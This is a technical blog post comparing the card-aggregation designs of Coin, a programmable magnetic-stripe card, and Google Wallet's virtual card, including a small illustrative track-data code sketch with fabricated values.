The second observation is that the virtual card and the actual backing instruments are completely decoupled. Unlike in the case of Coin, the Google Wallet virtual card is not a perfect replica of the original card the user added to their wallet. It does not have the same expiration date. They do not share the same name: for NFC transactions, cardholder names– ordinarily part of the emulated track data– are redacted. In fact they may not even be on the same network: the virtual cards are MasterCard, but the active funding source could be a Discover or American Express card. This is the illusion created by the virtual card: as far as the customer is concerned, they just paid with their American Express card– even if the merchant does not actually accept AmEx cards, a common situation at small businesses. The merchant, on the other hand, may be slightly better off in terms of transaction fees: even if they were accepting AmEx, they will likely pay a lower fee for processing the same amount over the MasterCard network, compared to ringing up a “native” AmEx card.

Another interesting property: the transaction types are different. The merchant-side experience is a card-present (CP) payment– this is how all NFC tap payments are treated, no different from swiping the magnetic stripe. Meanwhile the original issuing bank for the backing instrument sees a card-not-present (CNP) transaction from Google, similar to what would happen when making a purchase online by typing card details into a web page. In effect the CP transaction at the point of sale was proxied in real time into a CNP transaction against the backing card.

Other twists are introduced by this two-sided design, such as the handling of disputes and charge-backs, as well as merchant-specific rewards such as a credit card that gives cash back only for purchases made at gas stations. For our purposes, the key architectural difference between cloning cards (Coin) and proxying transactions in real time to another card (Google Wallet**) is sufficient to explore how each technology holds up against common fraud vectors, as well as their future prospects in the face of EMV chip & PIN adoption.

[continued]

CP

** Historical side-note: the first version of Google Wallet in late 2011 did not use virtual cards. Instead users had the option of provisioning their existing Citibank MasterCard or requesting a new prepaid card, also on the MasterCard network. Both of these were “native” cards: transactions were routed directly to the issuer without Google in the loop. From an implementation perspective, each card was represented by a distinct applet on the Android secure element. Virtual cards were introduced in an update the following August, and native cards subsequently deprecated.


Coin vs Google Wallet: comparing card-aggregation designs (part I)

Judging by the excitement around crowd-funded Coin, “card aggregation”– having a single credit card that can stand in for multiple payment instruments– speaks to an unmet market demand. In the abstract the concept hardly seems innovative; various online approximations already exist. Many online services such as PayPal perform exactly this function in the context of web payments. Users can load their PayPal account from traditional debit/credit cards or ACH transfers from a checking account, and later get to spend the funds at any merchant accepting PayPal. But that model requires a change on the merchant side to integrate the new payment method; PayPal transactions look very different from standard credit or debit payments to the merchant. Also, customers typically fund a stored-balance account ahead of time, floating money to the payment provider and committing to the payment source long before the actual transaction. It is a lot trickier to support real-time card aggregation within existing card networks, and more difficult still to implement it for in-person payments at a bricks-and-mortar location as opposed to online transactions. (Prepaid cards suffer from the same problem as PayPal: the requirement for advance funding.)

Coin is not the first company to tackle this problem, but it has gotten a lot more traction than previous attempts, which for the most part never went beyond a technology demonstration. One possible exception is Google Wallet. In 2012 Google introduced a different approach for combining multiple credit cards in a single mobile wallet. [Full disclosure: this blogger worked on Google Wallet.] These two products make for an interesting comparison, attempting to create the same user experience with diametrically opposed designs under the hood.

Coin: commercializing the dynamic mag-stripe

Coin is an example of programmable magnetic-stripe (also called “dynamic magnetic stripe”) technology, covered earlier on this blog. When a credit card is swiped, the point-of-sale terminal reads information encoded on a thin film of magnetized material on the back of the card. That information is used to request payment authorization from the card network. The physical layout as well as the logical format are standardized by ISO/IEC 7813. Informally the format is often referred to as track data, because it is organized into three tracks, with only the first two used on payment cards.
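
As a rough illustration with fabricated values, track 2 (the track most readers rely on) packs the account number, expiration, service code and issuer-defined data into one short string:

    // Illustrative ISO/IEC 7813 track 2 layout with made-up values. On a
    // physical card the string is framed by start/end sentinels and a checksum.
    public class Track2Sketch {
        public static void main(String[] args) {
            String pan = "5412345678901234";       // primary account number (fake)
            String expiry = "2712";                // YYMM: December 2027
            String serviceCode = "101";            // e.g. international card, normal authorization
            String discretionary = "0000000000";   // issuer-defined data (may include CVC1)
            String track2 = pan + "=" + expiry + serviceCode + discretionary;
            System.out.println(track2);            // 5412345678901234=27121010000000000
        }
    }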

For vanilla plastic cards the contents of the magnetic stripe never change. They are written once at the time of issuance and remain fixed for the lifetime of the payment instrument. About the only change that can occur is unintended and detrimental: contact with a very strong magnetic field can erase the encoded data, resulting in an unreadable card, much to the chagrin of the cardholder. This basic technology remained unchanged for decades, until around 2010 when programmable magnetic stripes made their commercial debut. These use a small embedded processor on the card to change the encoded data on demand. This technology clearly allows the realization of many advanced concepts, such as single-use card numbers or even single-use track data for a fixed card number that would be immune to skimming. (One could even implement a variation on the mag-stripe profile of EMV, by simulating an internal counter and reader challenge to output track data containing a dynamic CVC3.)

Coin implements a more elementary scenario: switching between track-data copied from multiple cards, in order to “simulate” any one of these cards. Coin relies on what is arguably a security flaw in the design of magnetic-stripe cards: it is trivial to clone them. Information encoded on the stripe is fixed and readable by anyone in possession of inexpensive off-the-shelf equipment. Anyone can create a new card with exactly the same data– and consequently the same spending authority as the original card, when it is swiped for a purchase.

Abstract architecture of Coin

Coin card model for aggregating multiple cards

Card-cloning, grassroots approach

When journalists speak of card-skimming attacks against ATMs and point-of-sale terminals, they are usually referring to gangs installing malicious software or physically tampering with reader hardware to steal magnetic-stripe data from any card swiped at that location. Armed with that information, the criminals can create duplicate cards bearing the same track data and attempt fraudulent purchases with these clones. (There are additional complications of course: the cards need additional features to look legitimate, such as appropriate logos, holograms and an embossed cardholder name. Also, since the CVC2 is not present on the magnetic stripe, the “clone” is only usable for card-present transactions.)

Coin institutionalizes that practice, except this time the cloning is done by the cardholder for their own convenience and benefit.

The product has not been released to the general public at the time of writing, but extensive FAQs and a lengthy demonstration given to TechCrunch convey the general approach taken for provisioning. Users are given card readers– similar to the ubiquitous white Square readers– that interface with their iPhone/Android device. Existing plastic cards are swiped to extract their track data. A mobile app then syncs the information over Bluetooth to the Coin card, where it is stored. Shortly before a transaction, that same mobile app allows choosing among the cloned cards. The dynamic magnetic stripe is then reconfigured to present a perfect copy of the same track data found on the original card.

[continued at part II]

CP

 

